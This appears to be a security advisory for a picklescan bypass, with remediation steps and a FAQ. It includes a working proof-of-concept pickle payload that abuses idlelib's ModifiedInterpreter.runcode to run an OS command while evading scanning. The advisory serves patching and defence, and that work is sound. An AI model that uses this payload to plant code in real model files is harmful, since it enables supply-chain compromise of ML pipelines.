GHSA-3gf5-cxq9-w223: picklescan: scanner bypass enables pickle RCE in ML models
Severity: MEDIUM

If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.
Risk Assessment
Practical risk is HIGH despite medium CVSS. This vulnerability defeats a security control specifically implemented to prevent pickle-based RCE — the exact threat it was designed to block. With a public PoC, exploitation is trivial. The blast radius is any pipeline that treats a picklescan pass as authorization to load a model file, which is likely the common deployment pattern. Supply chain attack potential is significant: a single poisoned model on HuggingFace Hub or similar registry could compromise many downstream environments.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.30 | 0.0.30 |
If you use any version of picklescan below 0.0.30, you are affected.
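A deployment script can fail closed when the installed picklescan predates the fix. This is a minimal sketch, not an official picklescan API: the 0.0.30 threshold comes from this advisory, and the helper names are ours.

```python
# Minimal sketch: refuse to trust scan results from a vulnerable picklescan.
# The 0.0.30 threshold comes from this advisory; helper names are illustrative.
from importlib.metadata import PackageNotFoundError, version

PATCHED = (0, 0, 30)

def is_patched_version(vstr: str) -> bool:
    """True if a picklescan version string is >= 0.0.30 (plain X.Y.Z assumed)."""
    return tuple(int(p) for p in vstr.split(".")[:3]) >= PATCHED

def picklescan_is_trustworthy() -> bool:
    try:
        return is_patched_version(version("picklescan"))
    except PackageNotFoundError:
        return False  # not installed: nothing to trust

if not picklescan_is_trustworthy():
    print("WARNING: picklescan missing or < 0.0.30; do not trust scan results")
```

Treat a negative result as a hard failure in CI rather than a warning if the pipeline loads models from external sources.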
Recommended Action
1. PATCH: Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).
2. AUDIT: Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.
3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.
4. DETECT: Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from the Python interpreter).
5. PREFER SAFE FORMATS: Where possible, prefer safetensors over pickle-based formats for model distribution.
Frequently Asked Questions
What is GHSA-3gf5-cxq9-w223?
If your team uses picklescan to gate ML model loading (PyTorch, etc.), that control is bypassed by this exploit — attackers can embed RCE payloads in pickle files that pass scanning. Patch picklescan to 0.0.30 immediately and audit any models loaded from untrusted sources since the library was deployed. Until patched, do not treat picklescan clearance as sufficient to load models from external or community sources.
Is GHSA-3gf5-cxq9-w223 actively exploited?
No confirmed active exploitation of GHSA-3gf5-cxq9-w223 has been reported, but organizations should still patch proactively.
How to fix GHSA-3gf5-cxq9-w223?
1. PATCH: Upgrade picklescan to >= 0.0.30 immediately (commit 1931c2d patches this bypass).
2. AUDIT: Review all models loaded via pickle since picklescan was deployed — assume any model from untrusted sources may be compromised.
3. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; add network egress controls on model-loading processes, run model loading in isolated sandboxes (containers with no network, restricted syscalls via seccomp), and enforce allowlists for model sources.
4. DETECT: Monitor for unexpected child processes spawned during model load operations (e.g., os.system calls from the Python interpreter).
5. PREFER SAFE FORMATS: Where possible, prefer safetensors over pickle-based formats for model distribution.
What systems are affected by GHSA-3gf5-cxq9-w223?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, agent frameworks loading external tools/models.
What is the CVSS score for GHSA-3gf5-cxq9-w223?
No numeric CVSS score has been published; the GitHub advisory carries a Medium severity rating.
Technical Details
NVD Description
Summary

The payload abuses idlelib.pyshell.ModifiedInterpreter.runcode, a function from Python's built-in IDLE library, to execute code carried in a remote pickle file.

Details

The attack executes in two steps. First, the attacker crafts a payload whose `__reduce__` method returns a call to idlelib.pyshell.ModifiedInterpreter.runcode. Then the victim scans the pickle file with the picklescan library, which does not detect any dangerous functions, and — believing the file safe — calls `pickle.load()` on it, leading to remote code execution.

PoC

```python
from idlelib.pyshell import ModifiedInterpreter
from types import SimpleNamespace

class EvilIdlelibPyshellModifiedInterpreterRuncode:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        fake_self = SimpleNamespace(
            locals={},
            tkconsole=SimpleNamespace(
                executing=False,
                beginexecuting=str,
                canceled=False,
                closing=False,
                showtraceback=str,
                endexecuting=str,
                stderr=None,
                text=SimpleNamespace(),
                getvar=str,
            ),
            rpcclt=None,
            debugger=None,
            checklinecache=str,
            active_seq=None,
            showtraceback=str,
            canceled=False,
            closing=False,
        )
        return ModifiedInterpreter.runcode, (fake_self, payload)
```

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected but executes when the file is loaded. Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu
Exploitation Scenario
An adversary uploads a PyTorch model (.pt file) to a public model hub or sends it via a supply chain vector. The file embeds a `__reduce__` method using `idlelib.pyshell.ModifiedInterpreter.runcode` — not in picklescan's blocklist — to execute an OS command. A target organization's automated MLOps pipeline downloads the model, runs picklescan for validation (result: CLEAN), then calls `torch.load()` or `pickle.load()`. On load, the payload executes: reverse shell, credential theft, or lateral movement. Because the compromise happens inside the Python process at model-load time, it inherits all permissions of the ML worker — often a privileged service account with access to training data, secrets, and inference infrastructure.
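The property this scenario relies on is that a pickle's `__reduce__` callable runs during deserialization itself, before the caller ever sees an object. A harmless demonstration — `abs` stands in for `os.system`, and the class name is ours:

```python
import pickle

class Demo:
    """Serializes itself as a call to abs(-5): a benign stand-in for os.system."""
    def __reduce__(self):
        # At load time, pickle calls abs(-5) and returns the result.
        return (abs, (-5,))

blob = pickle.dumps(Demo())
obj = pickle.loads(blob)  # the attacker-chosen callable fires here, inside loads()
print(obj)  # 5 -- Demo itself is never reconstructed
```

Note that the loader receives whatever the callable returns, not a `Demo` instance: by the time `pickle.loads()` returns, arbitrary code has already run with the full permissions of the Python process.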
Related Vulnerabilities
GHSA-vvpj-8cmc-gx39 (10.0) — picklescan: security flaw enables exploitation (same package: picklescan)
GHSA-g38g-8gr9-h9xp (9.8) — picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
GHSA-7wx9-6375-f5wh (9.8) — picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
CVE-2025-1945 (9.8) — picklescan: ZIP flag bypass enables RCE in PyTorch models (same package: picklescan)
GHSA-hgrh-qx5j-jfwx (8.8) — picklescan: Protection Bypass circumvents security controls (same package: picklescan)